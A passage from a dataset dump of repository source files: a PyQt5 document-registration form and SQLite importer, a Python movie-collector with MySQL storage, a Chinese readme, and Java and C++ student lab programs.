data)\n\telse:\n\t\tcur.execute(sql)\n\tcon.commit()\n\tcon.close()\n\n\n\ndef insert_many(sql, data):\n\tcon = sqlite3.connect(db_file_name)\n\tcur = con.cursor()\n\tcur.executemany(sql, data)\n\tcon.commit()\n\tcon.close()\n\n\ndef main():\n\tcreate_table()\n\tworkbook = xlrd.open_workbook(xls_file_name)\n\tfor sheet in workbook.sheets():\n\t\ttable_name = sheet.name\n\t\tcolumn_names = sheet.row_values(0)\n\t\tdata = [] #list of list of datas\n\t\tfor i in range(1, sheet.nrows):\n\t\t\tdata.append(sheet.row_values(i))\n\n\t\tcolumn_names_sql = ''\n\t\tfor index, field in enumerate(column_names):\n\t\t\tcolumn_names_sql += field\n\t\t\tif index+1 < len(column_names):\n\t\t\t\tcolumn_names_sql += ', '\n\n\t\twenhaos_sql = '?,'*(len(column_names)-1)+'?'\n\t\t#insert into table(name1, name2)values(?, ?)\n\t\tsql2 = 'insert into %s(%s) values (%s)'%(table_name, column_names_sql, wenhaos_sql)\n\t\t\n\t\tinsert_many(sql2, data)\n\t\t\n\n#export\ndef get_name_by_number(num):\n\tcon = sqlite3.connect(db_file_name)\n\tcur = con.cursor()\n\tcur.execute('select * from staff where littlephone = ?', (num,))\n\tres = cur.fetchall() \n\tif len(res) == 1:\n\t\tprint res[0]\n\n\tcon.commit()\n\tcon.close()\n\n\n\n\n\t\t\n\n\nif __name__ == '__main__':\n\tmain()\n\t#get_name_by_number('61955')" }, { "alpha_fraction": 0.624221920967102, "alphanum_fraction": 0.6398719549179077, "avg_line_length": 35.04487228393555, "blob_id": "8217086a6c5772f19b155db2649c60ba07e76183", "content_id": "d87957fb0b477c00daf6b01cfc8e74f72270a9c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5739, "license_type": "no_license", "max_line_length": 96, "num_lines": 156, "path": "/oa/document_manage.py", "repo_name": "topliugang/oa", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*- \nfrom lib_of_db_and_xls import *\n\nimport sys\nfrom PyQt5.QtCore import Qt, QRect\nfrom PyQt5.QtGui import QFont, QPainter\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtPrintSupport import QPrintDialog, QPrinter\n\n\nclass DocumentRecorder(QWidget):\n def __init__(self, parent=None):\n super(DocumentRecorder, self).__init__(parent)\n\n self._font = QFont()\n self._font.setPointSize(36)\n\n serial_number_label = QLabel(u\"顺序号:\")\n serial_number_label.setFont(self._font)\n self.serial_number_line = QLineEdit(u'1')\n self.serial_number_line.setFont(self._font)\n\n received_date_label = QLabel(u\"收文日期:\")\n received_date_label.setFont(self._font)\n self.received_date_line = QLineEdit(u'2017-02-07')\n self.received_date_line.setFont(self._font)\n\n from_department_label = QLabel(u\"来文机关:\")\n from_department_label.setFont(self._font)\n self.from_department_line = QLineEdit(u'枣组通字')\n self.from_department_line.setFont(self._font)\n\n document_number_label = QLabel(u\"文件号码:\")\n document_number_label.setFont(self._font)\n self.document_number_line = QLineEdit(u'3')\n self.document_number_line.setFont(self._font)\n\n secret_degree_label = QLabel(u\"秘密程度:\")\n secret_degree_label.setFont(self._font)\n self.secret_degree_line = QLineEdit(u'')\n self.secret_degree_line.setFont(self._font)\n\n document_date_label = QLabel(u\"文件日期:\")\n document_date_label.setFont(self._font)\n self.document_date_line = QLineEdit(u'2017-01-23')\n self.document_date_line.setFont(self._font)\n\n document_name_label = QLabel(u\"文件名称:\")\n document_name_label.setFont(self._font)\n self.document_name_line = QLineEdit(u'关于转发鲁组字[2016]63号文件的通知')\n self.document_name_line.setFont(self._font)\n\n copy_label = QLabel(u\"份数:\")\n copy_label.setFont(self._font)\n self.copy_line = QLineEdit()\n self.copy_line.setFont(self._font)\n\n to_staff_label = QLabel(u\"交办人:\")\n to_staff_label.setFont(self._font)\n self.to_staff_line = QLineEdit(u'陈')\n self.to_staff_line.setFont(self._font)\n\n recycle_date_label = QLabel(u\"收回日期:\")\n recycle_date_label.setFont(self._font)\n self.recycle_date_line = QLineEdit()\n self.recycle_date_line.setFont(self._font)\n\n self.submit_button = QPushButton('&submit')\n self.submit_button.setFont(self._font)\n self.submit_button.show()\n self.submit_button.clicked.connect(self.submit)\n\n self.print_button = QPushButton('&print')\n self.print_button.setFont(self._font)\n self.print_button.show()\n self.print_button.clicked.connect(self._print)\n\n buttonLayout = QHBoxLayout()\n buttonLayout.addWidget(self.submit_button)\n buttonLayout.addWidget(self.print_button)\n\n mainLayout = QGridLayout()\n mainLayout.addWidget(serial_number_label, 0, 0)\n mainLayout.addWidget(self.serial_number_line, 0, 1)\n\n mainLayout.addWidget(received_date_label, 1, 0)\n mainLayout.addWidget(self.received_date_line, 1, 1)\n\n mainLayout.addWidget(from_department_label, 2, 0)\n mainLayout.addWidget(self.from_department_line, 2, 1)\n\n mainLayout.addWidget(document_number_label, 3, 0)\n mainLayout.addWidget(self.document_number_line, 3, 1)\n\n mainLayout.addWidget(secret_degree_label, 4, 0)\n mainLayout.addWidget(self.secret_degree_line, 4, 1)\n\n mainLayout.addWidget(document_date_label, 5, 0)\n mainLayout.addWidget(self.document_date_line, 5, 1)\n\n mainLayout.addWidget(document_name_label, 6, 0)\n mainLayout.addWidget(self.document_name_line, 6, 1)\n\n mainLayout.addWidget(copy_label, 7, 0)\n mainLayout.addWidget(self.copy_line, 7, 1)\n\n mainLayout.addWidget(to_staff_label, 8, 0)\n mainLayout.addWidget(self.to_staff_line, 8, 1)\n\n mainLayout.addWidget(recycle_date_label, 9, 0)\n mainLayout.addWidget(self.recycle_date_line, 9, 1)\n\n mainLayout.addLayout(buttonLayout, 10, 1)\n\n self.setLayout(mainLayout)\n self.setWindowTitle(\"收文登记\")\n\n def submit(self):\n serial_number = self.serial_number_line.text()\n received_date = self.received_date_line.text()\n from_department = self.from_department_line.text()\n document_number = self.document_number_line.text()\n secret_degree = self.secret_degree_line.text()\n document_date = self.document_date_line.text()\n document_name = self.document_name_line.text()\n copy = self.copy_line.text()\n to_staff = self.to_staff_line.text()\n recycle_date = self.recycle_date_line.text()\n\n sql = \"\"\"\n \tinsert into document(\n\t\tserial_number, received_date, from_department, document_number, secret_degree, \n\t\tdocument_date, document_name, copy, to_staff, recycle_date) values\n\t\t(?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\n\t\t\"\"\"\n data = (serial_number, received_date, from_department, document_number, secret_degree, \\\n document_date, document_name, copy, to_staff, recycle_date)\n insert(sql, data)\n\n def _print(self):\n printer = QPrinter()\n dialog = QPrintDialog(printer, self)\n if dialog.exec_():\n painter = QPainter(printer)\n rect = QRect(10, 20, 80, 60)\n painter.drawEllipse(rect)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n dr = DocumentRecorder()\n # dr.resize(800, 600)\n # w.setWindowTitle('fuck')\n dr.show()\n\n sys.exit(app.exec_())\n" } ]
7
bytesniffer/collectMovies
https://github.com/bytesniffer/collectMovies
b7fad25635ac2733ad70efaebf6101333916ac55
5294a9de8486922452e03f1b4fa75dcd4b54ecd4
4fd4bfdaaba1a537a79462ca43a8b1847f3dd6d1
refs/heads/master
2020-06-13T01:18:07.526446
2019-07-18T01:02:03
2019-07-18T01:02:03
194,486,214
0
0
null
2019-06-30T07:06:46
2019-04-17T13:35:32
2019-03-26T02:53:43
null
[ { "alpha_fraction": 0.4918753504753113, "alphanum_fraction": 0.49397820234298706, "avg_line_length": 41.16935348510742, "blob_id": "eb23384f0ecc34ac52f2907a7fa6d7c0e4a2fdd8", "content_id": "2f7c86d7bdb3e6c7efa81c5593c46bf03d1fe559", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5231, "license_type": "no_license", "max_line_length": 118, "num_lines": 124, "path": "/collect/db/database.py", "repo_name": "bytesniffer/collectMovies", "src_encoding": "UTF-8", "text": "import pymysql\nimport time\nimport logging\n\n\nclass MacVod:\n def __init__(self,log_config ,mac_type_mapper, dbconfig):\n self.__dbconfig = dbconfig\n self.__log_config = log_config\n self.__db = pymysql.connect(self.__dbconfig['url'],\n self.__dbconfig['user'],\n self.__dbconfig['passwd'],\n self.__dbconfig['db'],\n charset='utf8')\n self.__cursor = self.__db.cursor()\n self.__mac_type_mapper = mac_type_mapper\n self.__mac_type_pid_mapper = self.__mac_type_pid_mapper()\n self.__logger = logging.getLogger(__name__)\n self.__logger.setLevel(logging.INFO)\n fhandler = logging.FileHandler(self.__log_config['file'])\n fhandler.setLevel(logging.INFO)\n formatter = logging.Formatter(self.__log_config['pattern'])\n fhandler.setFormatter(formatter)\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n self.__logger.addHandler(console)\n self.__logger.addHandler(fhandler)\n\n def insert_mac_vod(self, vod):\n\n insert_sql = \"\"\"INSERT INTO mac_vod(vod_id,type_id,type_id_1,vod_name,vod_year,\n vod_pic,vod_actor,vod_director,vod_remarks,vod_state,\n vod_lang,vod_class,vod_area,vod_play_from,vod_content,vod_play_server,\n vod_play_url,vod_down_url,vod_time,vod_time_add,\n vod_status) values({})\"\"\".format(\n self.__format_values(vod))\n\n try:\n self.__cursor.execute(insert_sql)\n self.__db.commit()\n except:\n self.__db.rollback()\n\n def update_mac_vod(self, vod):\n filed_values = \"\"\"\n vod_remarks='{marks}',vod_state='{state}',vod_play_url='{play_url}'\n \"\"\".format(marks=vod.note(),\n state=vod.state(),\n play_url=vod.content())\n condition = 'vod_id ={}'.format(vod.id())\n self.update('mac_vod', filed_values, condition)\n\n def __format_values(self, vod):\n type_id = self.__mac_type_mapper.get(int(vod.tid()), -1)\n vod_status = 1\n if type_id < 0:\n self.__logger.info('not found type id:{},{}'.format(vod.id(),\n vod.type()))\n vod_status = -1\n values = \"\"\"{vod_id},{type_id},{type_id_1},'{vod_name}',{vod_year},'{vod_pic}','{vod_actor}',\\\n '{vod_director}','{vod_remarks}',{vod_state},'{vod_language}','{vod_class}','{vod_area}','{vod_play_from}',\\\n '{vod_content}','{vod_play_server}','{vod_play_url}',' ',{vod_time},{vod_time_add},{vod_status}\n \"\"\".format(vod_id=vod.id(),\n type_id=type_id,\n type_id_1=self.__mac_type_pid_mapper[type_id],\n vod_name=vod.name(),\n vod_year=vod.year(),\n vod_pic=vod.pic(),\n vod_actor=vod.actor(),\n vod_director=vod.director(),\n vod_remarks=vod.note(),\n vod_state=vod.state(),\n vod_language=str(vod.lang()),\n vod_class=vod.type(),\n vod_area=vod.area(),\n vod_play_from=vod.content_flag(),\n vod_content=vod.des(),\n vod_play_server='no',\n vod_play_url=vod.content(),\n vod_time=self.__date_timestamp(vod.last_update()),\n vod_time_add=int(time.time()),\n vod_status=vod_status)\n return values\n\n def __date_timestamp(self, d):\n timestamp = time.strptime(d, '%Y-%m-%d %H:%M:%S')\n return time.mktime(timestamp)\n\n def update(self, table, field_values, condition):\n update_sql = \"\"\"\n update {} set {}\n \"\"\".format(table, field_values)\n if condition is not None:\n update_sql += \"where {}\".format(condition)\n self.__cursor.execute(update_sql)\n\n def delete(self, sql):\n self.__cursor.execute(sql)\n\n def select(self, table, condition, columns):\n select_sql = \"\"\"\n select {}\n from {} \"\"\".format(columns, table)\n if condition is not None:\n select_sql += \"where {}\".format(condition)\n self.__cursor.execute(select_sql)\n return self.__cursor.fetchall()\n\n def __mac_type_pid_mapper(self):\n columns = \"type_id,type_pid\"\n records = self.select('mac_type', None, columns)\n map = {}\n for r in records:\n map[r[0]] = r[1]\n return map\n\n def select_mac_columns(self):\n columns = \"\"\"vod_id,type_id,type_id_1,vod_name,vod_year,vod_pic,vod_actor,\n vod_director,vod_state,vod_language,vod_class,vod_area,vod_play_from,\n vod_content,vod_play_note,vod_time,vod_time_add,vod_status\"\"\"\n return columns\n\n def close(self):\n self.__db.close()\n\n\n" }, { "alpha_fraction": 0.509956955909729, "alphanum_fraction": 0.5131862163543701, "avg_line_length": 39.326087951660156, "blob_id": "afb3649fba1b65ce17cdb6fb570f27e8efa3d0c5", "content_id": "15a92af6f0e186369b306b361a179dbf034428de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3716, "license_type": "no_license", "max_line_length": 97, "num_lines": 92, "path": "/collect/parser/dbzyz/tracker.py", "repo_name": "bytesniffer/collectMovies", "src_encoding": "UTF-8", "text": "import logging\nimport _thread\nimport threading\nfrom db.database import MacVod\nimport time\nimport sys\n\n\nclass MovieTracker:\n\n def __init__(self, config, threads, task_queue):\n self.__config = config\n self.__task_queue = task_queue\n self.__stop = threading.Event()\n self.__threads = threads\n self.__log_config = config['log']\n self.__mac_vod_db = MacVod(config['log'], config['dbzyzmactype'], config['database'])\n self.__movie_id_set = self.__all_movie_ids()\n self.__tv_stats=self.__all_tv_id_stat()\n self.__logger = logging.getLogger(__name__)\n self.__logger.setLevel(logging.INFO)\n fhandler = logging.FileHandler(self.__log_config['file'])\n fhandler.setLevel(logging.INFO)\n formatter = logging.Formatter(self.__log_config['pattern'])\n fhandler.setFormatter(formatter)\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n self.__logger.addHandler(console)\n self.__logger.addHandler(fhandler)\n\n def start(self):\n self.__logger.info('started')\n for tid in range(self.__threads):\n self.__logger.info('starting tacker {}!'.format(tid))\n _thread.start_new_thread(self.run, (tid,))\n\n def run(self, tid):\n while not self.__stop.is_set():\n vod_event = self.__task_queue.get()\n self.__process(tid, vod_event)\n self.__logger.info(\"movie tracker {} stopped !\".format(tid))\n\n def __process(self, tid, vod_event):\n self.__logger.info('{} process {}'.format(tid, vod_event))\n vod_id = int(vod_event.id())\n if vod_id in self.__movie_id_set:\n # update\n note = str(vod_event.note())\n stat = int(vod_event.state())\n # feedback result stat not sync with note\n if stat == 0 and note.isdigit() and int(note) > 0:\n stat = int(note)\n vod_event.vod()['state'] = vod_event.note()\n old_stat = int(self.__tv_stats.get(vod_id, sys.maxsize))\n if stat > 0 and old_stat < stat:\n self.__logger.info('update tv id {},name {}'.format(vod_id,vod_event.name()))\n self.__mac_vod_db.update_mac_vod(vod_event)\n else:\n self.__logger.info('ignore update {} {}'.format(vod_id, vod_event.name()))\n\n else:\n self.__mac_vod_db.insert_mac_vod(vod_event)\n self.__logger.info('new vod id:{},name:{}'.format(vod_id, vod_event.name()))\n self.__movie_id_set.add(int(vod_id))\n\n def __type_filter(self, vod_event):\n print('type filter')\n\n def stop(self):\n # wait vod event consume finish\n while len(self.__queue) > 0:\n time.sleep(5)\n self.__stop.set()\n self.__logger.info('event queue is empty')\n self.__mac_vod_db.close()\n\n def __all_movie_ids(self):\n columns = 'vod_id'\n id_tuples = self.__mac_vod_db.select('mac_vod', None, columns)\n id_set = set()\n for id_t in id_tuples:\n id_set.add(id_t[0])\n return id_set\n\n def __all_tv_id_stat(self):\n columns = 'vod_id,vod_state'\n condition = 'type_id_1 in(2,3,4)'\n vod_stat = self.__mac_vod_db.select('mac_vod', condition, columns)\n stat_map = {}\n for stat in vod_stat:\n stat_map[stat[0]] = stat[1]\n return stat_map\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.7032967209815979, "alphanum_fraction": 0.7655677795410156, "avg_line_length": 23.81818199157715, "blob_id": "794e51684797a49777ce9b761ca8bd38f97c6842", "content_id": "d04fc325ab33ab40cf55aae573d2ae358f121bbd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 501, "license_type": "no_license", "max_line_length": 87, "num_lines": 11, "path": "/readme.md", "repo_name": "bytesniffer/collectMovies", "src_encoding": "UTF-8", "text": "### 自己在用的视频网站开源,真正的自动采集无需手动更新\n>目前这个网站做成个人订阅号形式,输入视频名称返回查询结果,如果大家对做成订阅号有兴趣的话,欢迎留言,我有时间再写个具体的教程供大家参考\n\n![image](./public/images/11.png)\n\n###使用教程\n>[http://www.tengewang.cn/archives/363.html](http://www.tengewang.cn/archives/363.html)\n\n###如果觉得有用欢迎star,谢谢!\n\n###技术交流qq群:592148970\n" }, { "alpha_fraction": 0.6192411780357361, "alphanum_fraction": 0.6192411780357361, "avg_line_length": 34.0476188659668, "blob_id": "ccdc37a3ac0e835e2eaf3ab3a37f128801a5056d", "content_id": "7529c4027efee8d46efae88cfae3530fd8701c42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 738, "license_type": "no_license", "max_line_length": 67, "num_lines": 21, "path": "/collect/parser/dbzyz/updator.py", "repo_name": "bytesniffer/collectMovies", "src_encoding": "UTF-8", "text": "\nimport logging\n\n\nclass MovieUpdator:\n\n def __init__(self, log_config, tid, task_queue, stop):\n # .Thread.__init__(self)\n self.__log_config=log_config\n self.__tid = tid\n self.__task_queue = task_queue\n self.__stop = stop\n self.__logger = logging.getLogger(__name__)\n self.__logger.setLevel(logging.INFO)\n fhandler = logging.FileHandler(self.__log_config['file'])\n fhandler.setLevel(logging.INFO)\n formatter = logging.Formatter(self.__log_config['pattern'])\n fhandler.setFormatter(formatter)\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n self.__logger.addHandler(console)\n self.__logger.addHandler(fhandler)\n\n" } ]
4
ankgitk/OOPlab
https://github.com/ankgitk/OOPlab
5aae07c235a08e66f1cbd29ccdfa6eb5bf7e4c7e
4fe2878d79363df6d22ea9690a292b2fc045fbb1
2857ebe93eb469cd085f7621d016e9dbb2029eba
refs/heads/master
2021-09-18T23:29:21.249824
2018-07-21T14:12:31
2018-07-21T14:12:31
111,445,735
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5960307121276855, "alphanum_fraction": 0.617157518863678, "avg_line_length": 15.806451797485352, "blob_id": "ac9a624d2afb9a1451c9afc916d807fb1f23abe5", "content_id": "637e0898ee6f417994c9ad84ba384db46e3383ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1562, "license_type": "no_license", "max_line_length": 60, "num_lines": 93, "path": "/ThreadDemo.java", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "import java.util.Random;\nimport java.util.Arrays;\nimport java.util.Scanner;\nclass Gen extends Thread\n{\n\tint i,array[];\n\tpublic Gen(int array[])\n\t{\n\t\tthis.array=array;\n\t}\n\tpublic void run()\n\t{\n\t\tRandom rand=new Random();\n\t\tSystem.out.println(\"Generated Random Numbers\");\n\t\tfor(i=0;i<100;i++)\n\t\t{\n\t\t\tarray[i]=rand.nextInt(1000);\n\t\t\tSystem.out.println(array[i]);\n\t\t}\n\t\tSystem.out.println(\"\\n\");\n\t}\n}\nclass Sort extends Thread\n{\n\tprivate int array[];\n\tpublic Sort(int array[])\n\t{\n\t\tthis.array=array;\n\t}\n\tpublic void run()\n\t{\n\t\tint i;\n\t\tArrays.sort(array);\n\t\tSystem.out.println(\"Sorted Array\");\n\t\tfor(i=0;i<100;i++)\n\t\t{\n\t\t\tSystem.out.println(array[i]);\n\t\t}\n\t\tSystem.out.println(\"\\n\");\n\t}\n}\nclass Search extends Thread\n{\n\tprivate int array[],ele;\n\tpublic Search(int array[])\n\t{\n\t\tthis.array=array;\n\t}\n\tpublic void run()\n\t{\n\t\tint i,f=0;\n\t\tScanner s=new Scanner(System.in);\n\t\tSystem.out.println(\"Enter Element to search\");\n\t\tele=s.nextInt();\n\t\tfor(i=0;i<100;i++)\n\t\t{\n\t\t\tif(array[i]==ele)\n\t\t\t{\n\t\t\t\tf=1;\n\t\t\t\tSystem.out.println(\"Element \"+ele+\" found at index \"+i);\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tif(f==0)\n\t\t\tSystem.out.println(\"Element \"+ele+\" not found\");\n\t}\n}\nclass ThreadDemo\n{\n\tpublic static void main(String args[])\n\t{\n\t\tint i;\n\t\tint array[]=new int[100];\n\t\tGen g=new Gen(array);\n\t\tSort s=new Sort(array);\n\t\tSearch sea=new Search(array);\n\t\tg.start();\n\t\ttry\n\t\t{\n\t\t\ts.sleep(100);\n\t\t}catch(InterruptedException e){}\n\t\ts.start();\n\t\ttry\n\t\t{\n\t\t\tsea.sleep(100);\n\t\t}catch(InterruptedException e){}\n\t\tsea.start();\n\t\t/*for(i=10;i<100;i++)\n\t\t{\n\t\t\tSystem.out.println(array[i]);\n\t\t}*/\n\t}\n}" }, { "alpha_fraction": 0.6102643609046936, "alphanum_fraction": 0.6251944303512573, "avg_line_length": 18.029584884643555, "blob_id": "3ac61850d46e9f2f54e258fbd74034562e7a302d", "content_id": "b00aa8c25e5c30d7ce3ac8b224eb127232f5dd24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3215, "license_type": "no_license", "max_line_length": 57, "num_lines": 169, "path": "/JavaCalc.java", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "import java.awt.*;\nimport java.awt.event.*;\nimport javax.swing.*;\n\npublic class JavaCalc extends JFrame \n{\n\tprivate JTextField tfin,tfin1,tfout;\n\tprivate JButton plbtn,minbtn,mulbtn,divbtn,eqbtn,clrbtn;\n\tprivate int result=0,zero=0;\n\tprivate char flag='F';\n\n\tpublic JavaCalc()\n\t{\n\t\tContainer cp= getContentPane();\n\t\tcp.setLayout(new FlowLayout());\n\n\t\tcp.add(new JLabel (\"Input1\"));\n\t\ttfin1=new JTextField(10);\n\t\tcp.add(tfin1);\n\n\t\tcp.add(new JLabel (\"Input2\"));\n\t\ttfin=new JTextField(10);\n\t\tcp.add(tfin);\n\n\t\tplbtn=new JButton(\"+\");\n\t\tcp.add(plbtn);\n\n\t\tminbtn=new JButton(\"-\");\n\t\tcp.add(minbtn);\n\n\t\tmulbtn=new JButton(\"*\");\n\t\tcp.add(mulbtn);\n\n\t\tdivbtn=new JButton(\"/\");\n\t\tcp.add(divbtn);\n\n\t\teqbtn=new JButton(\"=\");\n\t\tcp.add(eqbtn);\n\n\t\tclrbtn=new JButton(\"CLR\");\n\t\tcp.add(clrbtn);\n\n\t\tcp.add(new JLabel (\"Result\"));\n\t\ttfout=new JTextField(10);\n\t\ttfout.setEditable(false);\n\t\tcp.add(tfout);\n\n\t\tcp.add(new JLabel(\"Developed by Nabeel Javed\"));\n\n\t\t//Action Listeners\n\t\tplbtn.addActionListener(new ActionListener()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void actionPerformed(ActionEvent evt)\n\t\t\t{\n\t\t\t\tflag='+';\n\t\t\t}\n\t\t});\n\n\t\tminbtn.addActionListener(new ActionListener()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void actionPerformed(ActionEvent evt)\n\t\t\t{\n\t\t\t\tflag='-';\n\t\t\t}\n\t\t});\n\n\t\tmulbtn.addActionListener(new ActionListener()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void actionPerformed(ActionEvent evt)\n\t\t\t{\n\t\t\t\tflag='*';\n\t\t\t}\n\t\t});\n\n\t\tdivbtn.addActionListener(new ActionListener()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void actionPerformed(ActionEvent evt)\n\t\t\t{\n\t\t\t\tflag='/';\n\t\t\t}\n\t\t});\n\n\t\tclrbtn.addActionListener(new ActionListener()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void actionPerformed(ActionEvent evt)\n\t\t\t{\n\t\t\t\ttfin.setText(\"\");\n\t\t\t\ttfin1.setText(\"\");\n\t\t\t\ttfout.setText(\"\");\n\t\t\t}\n\t\t});\n\n\t\teqbtn.addActionListener(new ActionListener()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void actionPerformed(ActionEvent evt)\n\t\t\t{\n\t\t\t\tint num1=Integer.parseInt(tfin1.getText());\n\t\t\t\tint num2=Integer.parseInt(tfin.getText());\n\t\t\t\tswitch(flag)\n\t\t\t\t{\n\t\t\t\t\tcase '+':result=num1+num2;break;\n\t\t\t\t\tcase '-':result=num1-num2;break;\n\t\t\t\t\tcase '*':result=num1*num2;break;\n\t\t\t\t\tcase '/':try{\n\t\t\t\t\t\t\t\tresult=num1/num2;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tcatch(ArithmeticException e){zero=1;}\n\t\t\t\t}\n\t\t\t\tif (zero==0)\n\t\t\t\t\ttfout.setText(result+\"\");\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tzero=0;\n\t\t\t\t\ttfout.setText(\"Zero Division Error\");\n\t\t\t\t}\n\t\t\t}\n\t\t});\n\n\t\ttfin.addActionListener(new ActionListener()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void actionPerformed(ActionEvent evt)\n\t\t\t{\n\t\t\t\tint num1=Integer.parseInt(tfin1.getText());\n\t\t\t\tint num2=Integer.parseInt(tfin.getText());\n\t\t\t\tswitch(flag)\n\t\t\t\t{\n\t\t\t\t\tcase '+':result=num1+num2;break;\n\t\t\t\t\tcase '-':result=num1-num2;break;\n\t\t\t\t\tcase '*':result=num1*num2;break;\n\t\t\t\t\tcase '/':try{\n\t\t\t\t\t\t\t\tresult=num1/num2;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tcatch(ArithmeticException e){zero=1;}\n\t\t\t\t}\n\t\t\t\tif (zero==0)\n\t\t\t\t\ttfout.setText(result+\"\");\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tzero=0;\n\t\t\t\t\ttfout.setText(\"Zero Division Error\");\n\t\t\t\t}\n\t\t\t}\n\t\t});\n\n\t\tsetDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);\n\t\tsetTitle(\"Calculator\");\n\t\tsetSize(200,250);\n\t\tsetVisible(true);\n\t\tsetResizable(false);\n\t}\n\tpublic static void main(String [] args)\n\t{\n\t\tSwingUtilities.invokeLater(new Runnable()\n\t\t{\n\t\t\t@Override\n\t\t\tpublic void run()\n\t\t\t{\n\t\t\t\tnew JavaCalc();\n\t\t\t}\n\t\t});\n\t}\n}" }, { "alpha_fraction": 0.548019528388977, "alphanum_fraction": 0.5599566102027893, "avg_line_length": 14.239669799804688, "blob_id": "b136711f7d351ac6ee1619a5c5e0821fc8dd74cb", "content_id": "bf1b707b36166bbf54e39f2c5e62fccfafe3b375", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1843, "license_type": "no_license", "max_line_length": 58, "num_lines": 121, "path": "/inher2.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass employee\n{\n\tchar name[25];\n\tint eno;\n\tpublic:\n\t\temployee()\n\t\t{\n\t\t\tstrcpy(name,\"none\");\n\t\t\teno=0;\t\n\t\t}\n\t\tvoid getdata()\n\t\t{\n\t\t\tcout<<\"Enter name: \";\n\t\t\tcin>>name;\n\t\t\tcout<<\"Enter Employee number: \";\n\t\t\tcin>>eno;\n\t\t}\n\t\tvoid putdata()\n\t\t{\n\t\t\tcout<<\"Name:\"<<name<<\"\\tEmployee number:\"<<eno;\n\t\t}\n\t\t~employee();\n};\nclass manager: public employee\n{\n\tchar title[15];\n\tfloat dues;\n\tpublic:\n\t\tmanager()\n\t\t{\n\t\t\tstrcpy(title,\"employee\");\n\t\t\tdues=0.0;\n\t\t}\n\t\tvoid getdata()\n\t\t{\n\t\t\temployee::getdata();\n\t\t\tcout<<\"Enter title: \";\n\t\t\tcin>>title;\n\t\t\tcout<<\"Enyer dues: \";\n\t\t\tcin>>dues;\n\t\t}\n\t\tvoid putdata()\n\t\t{\n\t\t\temployee::putdata();\n\t\t\tcout<<\"\\tTitle:\"<<title<<\"\\tDues:\"<<dues;\n\t\t}\n\t\t~manager();\n};\nclass scientist: public employee\n{\n\tint noop;\n\tpublic:\n\t\tscientist()\n\t\t{\n\t\t\tnoop=0;\n\t\t}\n\t\tvoid getdata()\n\t\t{\n\t\t\temployee::getdata();\n\t\t\tcout<<\"Enter no of publications: \";\n\t\t\tcin>>noop;\n\t\t}\n\t\tvoid putdata()\n\t\t{\n\t\t\temployee::putdata();\n\t\t\tcout<<\"\\tPublications:\"<<noop;\n\t\t}\n\t\t~scientist();\n};\nclass labourer: public employee\n{\n\tpublic:\n\t\tlabourer();\n\t\tvoid getdata()\n\t\t{\n\t\t\temployee::getdata();\n\t\t}\n\t\tvoid putdata()\n\t\t{\n\t\t\temployee::putdata();\n\t\t\tcout<<\"\\n\";\n\t\t}\n\t\t~labourer();\n};\nint main()\n{\n\tmanager m[10];\n\tchar ch;\n\tint sn=0,ln=0,mn=0,n,i;\n\tscientist s[10];\n\tlabourer l[10];\n\tcout<<\"how many records?\";\n\tcin>>n;\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcout<<\"M for manager, S for scientist, L for labourer:\";\n\t\tcin>>ch;\n\t\tswitch(ch)\n\t\t{\n\t\t\tcase 's':\n\t\t\tcase 'S': s[sn++].getdata();break;\n\t\t\tcase 'm':\n\t\t\tcase 'M': m[mn++].getdata();break;\n\t\t\tcase 'l':\n\t\t\tcase 'L': l[ln++].getdata();break;\n\t\t\tdefault:cout<<\"wrong choice!\";\n\t\t}\n\t}\n\tcout<<\"\\nMANAGERS\\n\";\n\tfor(i=0;i<mn;i++)\n\t\tm[i].putdata();\n\tcout<<\"\\nSCIENTISTS\\n\";\n\tfor(i=0;i<sn;i++)\n\t\ts[i].putdata();\n\tcout<<\"\\nLABOURERS\\n\";\n\tfor(i=0;i<ln;i++)\n\t\tl[i].putdata();\n\treturn 0;\n}" }, { "alpha_fraction": 0.675000011920929, "alphanum_fraction": 0.675000011920929, "avg_line_length": 40, "blob_id": "5c3e9875ae49405b0b79de5fed8ee624246f07b2", "content_id": "c773d0ade7ede2e683b110b2c2213a7637c1648a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40, "license_type": "no_license", "max_line_length": 40, "num_lines": 1, "path": "/cop.py", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "a,b=input(\"Enter two numbers: \").split()" }, 